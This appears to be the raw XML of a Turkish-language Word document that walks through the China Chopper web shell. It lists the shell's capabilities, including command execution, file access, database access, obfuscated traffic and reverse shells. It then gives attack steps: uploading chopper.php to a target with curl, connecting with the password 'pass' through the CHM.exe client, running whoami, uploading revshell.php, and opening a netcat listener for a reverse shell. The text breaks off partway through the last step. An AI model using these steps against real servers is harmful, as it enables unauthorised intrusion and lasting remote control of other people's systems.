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D090" w14:textId="05262A45" w:rsidR="00FE6551" w:rsidRPr="00FE6551" w:rsidRDefault="00FE6551" w:rsidP="00FE6551">
      <w:pPr>
        <w:pStyle w:val="p1"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pP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China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 xml:space="preserve">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Chopper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE6551">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve">, küçük boyutlu ve güçlü bir </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE6551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FE6551">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve"> aracıdır. Saldırganlar tarafından web sunucularına sızıldıktan sonra uzaktan kontrol sağlamak, komut çalıştırmak, dosya yüklemek/indirmek, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE6551">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>veritabanına</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE6551">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve"> erişmek ve </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE6551">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>reverse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE6551">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE6551">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE6551">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve"> açmak gibi işlemler için kullanılır.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69829E5C" w14:textId="77777777" w:rsidR="00FE6551" w:rsidRPr="00FE6551" w:rsidRDefault="00FE6551" w:rsidP="00FE6551">
      <w:pPr>
        <w:pStyle w:val="p1"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1ABCD864" w14:textId="24303C36" w:rsidR="00FE6551" w:rsidRPr="00FE6551" w:rsidRDefault="00FE6551" w:rsidP="00FE6551">
      <w:pPr>
        <w:pStyle w:val="p1"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE6551">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve">Yalnızca 4 KB boyutunda bir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client</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE6551">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve"> ve karşılık olarak sunucuya yerleştirilen </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE6551">
        <w:rPr>
          <w:rStyle w:val="s1"/>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Helvetica"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“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backdoor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 xml:space="preserve">” (web </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE6551">
        <w:rPr>
          <w:rStyle w:val="s1"/>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Helvetica"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE6551">
        <w:rPr>
          <w:rStyle w:val="s1"/>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Helvetica"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE6551">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve"> dosyasından oluşur.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED6D504" w14:textId="77777777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3CCFCAE8" w14:textId="5CBFA2D6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0AA8073F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Küçük Boyutlu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Sadece 4 KB boyutunda PHP, ASPX, JSP veya CFM formatında olabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2AA1A6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Grafiksel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Windows tabanlı istemci üzerinden yönetim sağlar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D884C1F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Dosya Yöneticisi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Dosya yükleme, düzenleme, silme.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DD33FA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Komut Satırı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Tüm sistem komutları gönderilebilir.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511FDB2E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Veritabanı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Erişimi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MySQL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, MSSQL bağlantısı yapabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2859FD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Obfuscation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Desteği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: Tespiti zorlaştırmak için şifreli iletişim kurar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D11166C" w14:textId="77777777" w:rsidR="00FE6551" w:rsidRPr="00FE6551" w:rsidRDefault="00FE6551" w:rsidP="00FE655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Reverse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Shell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özelliği mevcuttur.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C28E557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928B41F" w14:textId="77777777" w:rsidR="00FE6551" w:rsidRPr="00FE6551" w:rsidRDefault="00FE6551" w:rsidP="00FE655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China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Kullanımı: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 + Hedef Web Sunucusu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6550A4E3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2A643534" w14:textId="6847BD76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1: Web Sunucusuna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Backdoor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(Shell) Dosyasını Yükle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754DE8CD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6159D6AB" w14:textId="5E51704B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Örnek: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chopper.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="25BC557E" w14:textId="2F654B54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curl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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-T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chopper.php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http://target.com/uploads/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907F4A6" w14:textId="77777777" w:rsidR="00FE6551" w:rsidRPr="00FE6551" w:rsidRDefault="00FE6551" w:rsidP="00FE6551">
      <w:pPr>
        <w:pStyle w:val="p1"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FE6551">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve">Shell adı: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE6551">
        <w:rPr>
          <w:rStyle w:val="s1"/>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>chopper.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="11414220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  <w:r w:rsidRPr="00FE6551">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve">Parola parametresi: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE6551">
        <w:rPr>
          <w:rStyle w:val="s1"/>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>pass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2C7A97C5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</w:p>
    <w:p w14:paraId="0DF55B0D" w14:textId="77777777" w:rsidR="00FE6551" w:rsidRPr="00FE6551" w:rsidRDefault="00FE6551" w:rsidP="00FE6551">
      <w:pPr>
        <w:pStyle w:val="p1"/>
        <w:rPr>
          <w:rStyle w:val="s1"/>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="193C4116" w14:textId="77777777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Adım 2: Windows’ta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Client’ı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Başlatın</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3799B066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1E1116DE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Client: CHM.exe (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China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Chopper’ın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Windows GUI istemcisi)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A70603" w14:textId="77777777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“File Manager” paneli açılır</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729E5FE1" w14:textId="77777777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 URL: http://target.com/uploads/chopper.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314B754A" w14:textId="52B71AC9" w:rsidR="00FE6551" w:rsidRPr="00FE6551" w:rsidRDefault="00FE6551" w:rsidP="00FE6551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Password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pass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="36DF58EC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Shell bağlantısı başarılı olursa:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316322B0" w14:textId="77777777" w:rsidR="00FE6551" w:rsidRPr="00FE6551" w:rsidRDefault="00FE6551" w:rsidP="00FE655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Dizin yapısı listelenir</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43368252" w14:textId="77777777" w:rsidR="00FE6551" w:rsidRPr="00FE6551" w:rsidRDefault="00FE6551" w:rsidP="00FE6551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çalıştırma paneli açılır</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D32491A" w14:textId="370F3AD9" w:rsidR="00FE6551" w:rsidRPr="00FE6551" w:rsidRDefault="00FE6551" w:rsidP="00FE6551">
      <w:pPr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021BCF6" w14:textId="009B8F0E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Komut Gönderimi ve Yanıt Alma</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D9297F" w14:textId="799E11E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GUI içindeki terminal alanına komut yazılır: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whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1E3C9067" w14:textId="2B370A97" w:rsidR="00FE6551" w:rsidRPr="00FE6551" w:rsidRDefault="00FE6551" w:rsidP="00FE655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</w:t>
      </w:r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erminalde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Chopper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Logu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(Sunucu tarafı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Apache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loglarında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görünür):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168731AA" w14:textId="0326E519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062FAC2E" wp14:editId="394F3394">
            <wp:extent cx="3136900" cy="698500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7551600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0024" name="Resim 755160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0338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51B57FA5" w14:textId="251CD761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Dosya Yükleme</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEEC2D8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GUI içinden:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B5BEF8" w14:textId="77777777" w:rsidR="00FE6551" w:rsidRPr="00FE6551" w:rsidRDefault="00FE6551" w:rsidP="00FE65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Sağ tık </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE6551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→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“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Upload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7B6C1C83" w14:textId="77777777" w:rsidR="00FE6551" w:rsidRPr="00FE6551" w:rsidRDefault="00FE6551" w:rsidP="00FE6551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revshell.php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dosyası seçilir</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24ED5CC9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C56FABD" w14:textId="77777777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C47F253" w14:textId="3D5D38C0" w:rsidR="00FE6551" w:rsidRPr="00FE6551" w:rsidRDefault="00FE6551" w:rsidP="00FE655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5: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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Reverse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE655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Shell Tetikleme (PHP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F280084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7CA8A1CA" w14:textId="77777777" w:rsidR="00FE6551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Kali’de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listener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başlatılır:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8F2390" w14:textId="558B7FB0" w:rsidR="007F3392" w:rsidRPr="00FE6551" w:rsidRDefault="00FE6551" w:rsidP="00FE655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nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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lvnp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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4444</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE6551">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="tr-TR"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>” komutu ile</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="007F3392" w:rsidRPr="00FE655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32D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7D36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600AD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="568C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B0B45"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="10C4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D6B5E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="989E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816492">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="2011912001">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="619530055">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="642853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51"/>
    <w:rsid w:val="00411558"/>
    <w:rsid w:val="005B72A9"/>
    <w:rsid w:val="007F3392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4A58"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{5A7B17F4-6A4D-C14F-9742-AB75B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E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E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E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FE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E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E65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E65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E65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E65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E6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FE6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FE6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FE655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E655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E655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E655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E655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E655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E65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6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E65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E6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E6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E655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E655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E655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E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E655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E655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FE6551"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="p2">
    <w:name w:val="p2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apple-converted-space">
    <w:name w:val="apple-converted-space"/>
    <w:basedOn w:val="VarsaylanParagrafYazTipi"/>
    <w:rsid w:val="00FE6551"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="p3">
    <w:name w:val="p3"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00FE65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FE6551"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="s3">
    <w:name w:val="s3"/>
    <w:basedOn w:val="VarsaylanParagrafYazTipi"/>
    <w:rsid w:val="00FE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2025-08-04T07:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-04T07:19:00Z</dcterms:modified>
</cp:coreProperties>
</file>